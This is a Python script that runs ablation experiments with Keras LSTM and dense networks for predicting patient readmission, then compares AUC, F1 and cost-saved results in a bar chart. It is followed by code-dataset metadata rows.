print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
# print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 0111 - MDF+LSTM+CA
exp='0111'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
es=EarlyStopping(monitor='val_loss', patience=20, mode='min')
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 0110 - MDF+LSTM
exp='0110'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1011 - HDF+LSTM+CA
exp='1011'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
es=EarlyStopping(monitor='val_loss', patience=20, mode='min')
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1010 - HDF+LSTM
exp='1010'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print(model.summary())
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1101 - HDF+MDF+CA
exp='1101'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='None', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1101 - HDF+MDF
exp='1100'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='None', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.3, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1001 - HDF+CA
exp='1001'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='None', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1000 - HDF only
exp='1000'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='None', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1000 - MDF only
exp='0100'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='None', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 0101 - MDF + CA only
exp='0101'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='None', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
#print([np.mean(np.fromiter(np.load('cost_saved_1111.npy').item().values(), dtype=float)),np.std(np.fromiter(np.load('cost_saved_1111.npy').item().values(), dtype=float))])
AUC_1111=np.fromiter(np.load('AUC_test_1111.npy').item().values(), dtype=float)
AUC_1110=np.fromiter(np.load('AUC_test_1110.npy').item().values(), dtype=float)
AUC_1011=np.fromiter(np.load('AUC_test_1011.npy').item().values(), dtype=float)
AUC_0111=np.fromiter(np.load('AUC_test_0111.npy').item().values(), dtype=float)
AUC_1101=np.fromiter(np.load('AUC_test_1101.npy').item().values(), dtype=float)
cs_1111=np.fromiter(np.load('cost_saved_1111.npy').item().values(), dtype=float)
cs_1110=np.fromiter(np.load('cost_saved_1110.npy').item().values(), dtype=float)
cs_1011=np.fromiter(np.load('cost_saved_1011.npy').item().values(), dtype=float)
cs_0111=np.fromiter(np.load('cost_saved_0111.npy').item().values(), dtype=float)
cs_1101=np.fromiter(np.load('cost_saved_1101.npy').item().values(), dtype=float)
f1_1111=np.fromiter(np.load('f1_score_1111.npy').item().values(), dtype=float)
f1_1110=np.fromiter(np.load('f1_score_1110.npy').item().values(), dtype=float)
f1_1011=np.fromiter(np.load('f1_score_1011.npy').item().values(), dtype=float)
f1_0111=np.fromiter(np.load('f1_score_0111.npy').item().values(), dtype=float)
f1_1101=np.fromiter(np.load('f1_score_1101.npy').item().values(), dtype=float)
#aucs_mean = [np.mean(AUC_1111), np.mean(AUC_1110)]
#aucs_std = [np.std(AUC_1111), np.std(AUC_1110)]
df_results = pd.DataFrame(np.array([[np.mean(AUC_1111), np.mean(AUC_1110),np.mean(AUC_0111),np.mean(AUC_1011),np.mean(AUC_1101)], \
[np.mean(f1_1111), np.mean(f1_1110), np.mean(f1_0111), np.mean(f1_1011), np.mean(f1_1101)], \
[np.mean(cs_1111), np.mean(cs_1110),np.mean(cs_0111),np.mean(cs_1011),np.mean(cs_1101)], \
]))
df_std = pd.DataFrame(np.array([[np.std(AUC_1111)/1, np.std(AUC_1110)/1,np.std(AUC_0111)/1,np.std(AUC_1011)/1,np.std(AUC_1101)/1], \
[np.std(f1_1111)/1, np.std(f1_1110)/1, np.std(f1_0111)/1, np.std(f1_1011)/1, np.std(f1_1101)/1], \
[np.std(cs_1111)/1, np.std(cs_1110)/1, np.std(cs_0111)/1, np.std(cs_1011)/1, np.std(cs_1101)/1], \
]))
df_results.index = ['ROC AUC','F1 score','Cost saved']
df_results.columns = ['Complete Model', 'Without CA', 'Without HDF', 'Without MDF','Without LSTM']
#patterns = (('/'),('o'))
colors=['blue','skyblue','silver','gray', 'black']
fig, ax = plt.subplots()
#plt.rcParams.update({'figure.figsize': [5, 5], 'font.size': 22})
plt.rcParams.update({'font.size': 20, 'figure.figsize': [10,8]})
ax = df_results[::-1].plot.barh(ax=ax, xerr=np.array(df_std[::-1]).transpose(),color=colors,width=0.7,capsize=5)
ax.legend(bbox_to_anchor=(0.95, 0.30))
#ax.set_xlabel('F1 score / Cost Savings')
plt.tight_layout()
#Options
plt.show()
plt.savefig('fig3.pdf', format='pdf', dpi=1000)
#SIGNIFICANCE TESTS
#label='cost_saved'
#c=np.fromiter(np.load(label+'_1110.npy').item().values(), dtype=float)
#d=np.fromiter(np.load(label+'_1111.npy').item().values(), dtype=float)
#a,b=stats.ttest_ind(c,d)
#print(a,b)
#import scipy.io as sio
#y_pred = model.predict(X_test).ravel()
#sio.savemat('y_pred_new_review2.mat', {'y_pred':y_pred,'Visit_ID':Visit_test.ravel(),'Y_test':Y_test.ravel(),'Sample':Sample_weight_test.ravel()})
| 45.169897
| 434
| 0.712652
| 6,197
| 39,614
| 4.302888
| 0.056802
| 0.112957
| 0.041178
| 0.054903
| 0.851341
| 0.838927
| 0.8057
| 0.80015
| 0.796287
| 0.792087
| 0
| 0.033292
| 0.146211
| 39,614
| 876
| 435
| 45.221461
| 0.7551
| 0.091155
| 0
| 0.758953
| 0
| 0
| 0.081638
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011019
| false
| 0
| 0.026171
| 0
| 0.048209
| 0.118457
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c048e47bcd8104839104ec01ab44cde0de4c98fe
| 31,537
|
py
|
Python
|
packages/syft/src/syft/core/node/common/node_service/object_request/object_request_messages.py
|
pculliton/PySyft
|
23a0d1442d3d901b1139aeabe079ccf4177ebc0d
|
[
"Apache-2.0"
] | 2
|
2022-02-18T03:48:27.000Z
|
2022-03-05T06:13:57.000Z
|
packages/syft/src/syft/core/node/common/node_service/object_request/object_request_messages.py
|
pculliton/PySyft
|
23a0d1442d3d901b1139aeabe079ccf4177ebc0d
|
[
"Apache-2.0"
] | 3
|
2021-11-17T15:34:03.000Z
|
2021-12-08T14:39:10.000Z
|
packages/syft/src/syft/core/node/common/node_service/object_request/object_request_messages.py
|
pculliton/PySyft
|
